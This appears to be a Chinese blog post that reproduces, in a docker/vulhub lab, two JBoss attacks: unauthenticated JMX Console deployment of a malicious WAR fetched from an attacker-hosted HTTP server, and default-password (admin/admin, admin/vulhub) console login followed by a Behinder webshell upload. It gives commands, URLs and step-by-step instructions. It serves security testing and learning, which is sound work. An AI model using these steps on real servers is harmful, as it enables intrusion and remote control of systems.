JBoss 未授权访问和弱口令复现

JBoss 未授权访问和弱口令复现

JBoss简介

一个基于J2EE的开放源代码的应用服务器 。JBoss 是一个管理 EJB 的容器和服务器,但 JBoss 核心服务不包括支持 servlet/JSP 的WEB容器,一般 与Tomcat或Jetty绑定使用。Jboss是Java EE 应用服务器(就像Apache是web服务器一样),专门用来 运行Java EE程序的。

JMX Console 未授权访问漏洞

环境搭建
docker search testjboss 
docker pull testjboss/jboss 
docker run -p 8080:8080 -d testjboss/jboss

JBoss框架的常见页面如下。

请添加图片描述

复现过程

1.访问它的后台页面 ,可以直接进入它的后台, 如果要登录账号和密码都是admin。

 http://192.168.42.132:8080/jmx-console/

2.找到jboss.deployment,进入后找到 void addURL() ,有两个,选择java.lang .String 那个去填写恶意文件的网址。

请添加图片描述
请添加图片描述

3.攻击机上用python开启http服务,在路径上输入恶意文件的位置,然后点击invoke。会发现部署成功,就返回上一层点击apply 。

//开启http服务
python3 -m http.server

//打包war 包
jar -cvf yijian.war yijian.jsp

//文件所在位置
http://192.168.3.18:8000/yijian.war

请添加图片描述
请添加图片描述

4.会然后攻击机上开启服务就会接收到请求,成功则显示200.也可以再返回上一层,找到jboss.web.deployment 查看是否部署成功。

请添加图片描述
请添加图片描述

5.成功后就访问地址,用webshell管理工具,但后面发现蚁剑的shell不行,得用冰蝎去连接。(步骤和前面一样) 发现部署失败或者连接不到上传的shell,就重启靶场,按步骤用冰蝎的shell.jsp上线即可。

http://192.168.42.132:8000/shell/shell.jsp

请添加图片描述

Jboss弱口令Getshell

漏洞简介

JBoss Administration Console存在默认账号密码admin/admin,但如果在vulhub上搭建的靶场,那密码就是vulhub 。如果Administration Console可以登录,就可以在后台部署war包。

环境搭建

在vulhub上找到jboss,然后开启它就可以了。

请添加图片描述

复现过程

1.访问地址,点击administration console ,在弹窗上输入账号和密码 admin /vulhub 。

请添加图片描述

在这里插入图片描述

2.点击war那,进行 add 。选择上面未授权靶场利用到的冰蝎shell.jsp打包生成的shell.war 进行上传。
在这里插入图片描述

在这里插入图片描述

3.成功部署后,点击content,继续选择shell.war 恶意文件进行上传。

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

4.访问上传的木马文件,用冰蝎进行连接。

http://ip:8080/shell/shell.jsp

请添加图片描述

本文仅限于进行安全测试,请勿使用来作攻击他人电脑,造成损失和违法犯罪行为与作者本人无关。

  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值